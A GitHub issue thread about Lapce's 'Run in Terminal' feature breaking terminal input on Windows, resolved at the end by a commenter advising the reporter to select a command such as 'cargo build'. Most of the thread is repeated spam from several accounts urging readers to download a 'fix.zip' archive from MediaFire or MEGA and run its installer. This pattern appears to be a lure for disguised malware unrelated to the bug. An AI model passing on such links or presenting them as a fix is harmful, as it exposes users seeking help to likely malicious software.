### ISSUE TITLE
"Run in Terminal" can not run normally

### ISSUE THREAD

**Issue by zhouxs1023** [lapce/lapce#3450]
## Lapce Version

 version V0.4.2

## System information

the operating system : WINDOWS10

## Describe the bug

Select some function to "Run in Terminal",but can not run normally, as below screenshot1

then other terminal windows also cannot input normally as screenshot2；

Close   "Run in Terminal" windows, then other terminal windows cannot still input normally as screenshot3:

## Additional information
![111](https://github.com/user-attachments/assets/87d24004-b7cf-4dde-bd83-36072a653df6)

![222](https://github.com/user-attachments/assets/d9514c74-284c-41d8-9cc7-618dbf61e8eb)

![333](https://github.com/user-attachments/assets/e7fc4c29-3e6d-41f1-bfb2-272957f22778)

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by jm-observer** [comment]
you should select text like `cargo build`, not function

**Comment by zhouxs1023** [comment]
Thanks!
